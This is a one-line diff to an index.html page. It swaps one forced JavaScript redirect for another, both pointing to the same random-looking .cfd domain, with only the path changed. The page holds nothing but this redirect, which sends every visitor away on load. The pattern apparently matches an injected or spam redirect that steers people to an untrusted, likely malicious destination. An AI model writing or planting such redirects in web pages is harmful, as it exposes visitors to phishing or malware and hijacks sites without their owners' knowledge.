--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<script type="text/javascript">window.location.href ="https://kidneslopshde.cfd/kizo/";</script>
+<script type="text/javascript">window.location.href ="https://kidneslopshde.cfd/yim/";</script>
